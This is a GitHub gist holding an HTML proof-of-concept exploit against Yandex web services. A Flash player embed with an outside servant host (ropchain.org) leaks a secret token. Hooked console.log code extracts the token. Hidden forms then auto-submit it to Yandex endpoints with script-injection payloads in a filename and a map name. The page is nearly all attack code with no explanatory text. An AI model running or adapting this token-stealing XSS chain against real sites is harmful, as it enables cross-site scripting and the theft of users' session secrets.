Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
<html><body>
<script>
console.log=function(a){
var x = document.getElementById("content");
if(a == "Start") {
// start ;-)
}
else {
var pos = a.search("secret-key");
var token = a.substring(pos+13, pos+13+33);
alert("The secret token is: " + token);
//XSS 1
var f1 = document.getElementById("f1");
f1.action = "http://interactive-answers.webmaster.yandex.com/gate/add-scheme/get?crc="+ token +"&filename=f%3Cscript%3Ealert(document.location)%3C%2Fscript%3E.png";
f1.submit();
var f2 = document.getElementById("f2");
document.getElementById("crc").value=token;
f2.submit();
sub();
}
}
function sub(){
var tmp = document.createElement("iframe");
tmp.src = "http://api.yandex.ru/maps/tools/constructor/";
tmp.sandbox = "allow-scripts allow-same-origin allow-forms";
document.getElementById("ble").appendChild(tmp);
}
</script>
<br><center>
<object data="http://kraski-static.yandex.net/kraski-universal-blogplayer-loader.swf?baseUrl=http://kraski.yandex.ru&servantUrl=http://ropchain.org/poc/yandex&uploadUrl=http://ropchain.org/poc/yandex/&cardHash=flower017.jpg.2" width="500" height="600" allowscriptaccess="always">
</object>
</center>
<form id="f1" target="xss1" action="" method="POST" enctype="multipart/formdata"></form>
<form id="f2" target="xss2" action="http://api.yandex.ru/maps/tools/constructor/proxy.xml" method="POST">
<input id="crc" type="hidden" name="key" value="">
<input type="hidden" name="v" value="1.0">
<input type="hidden" name="action" value="create">
<input type="hidden" name="map" value='{"name":"f<script>alert(document.location);</script>","sid":"","size":[600,450],"lang":"ru-RU","boundedBy":[[16.70123,52.32187],[17.11321,52.5108]],"type":"MAP","geoObjects":[{"style":"twirl#lightblueDotIcon","geometry":{"type":"Point","coordinates":[16.93827,52.40947]},"name":"Познань,+Велheheикопольское+воеводство,+Польша"}],"styles":{},"center":[16.90722,52.41644],"zoom":11}'>
</form>
<iframe name="xss1" width="0" height="0"></iframe>
<iframe name="xss2" width="0" height="0"></iframe>
<div id="ble"></div>
</body></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment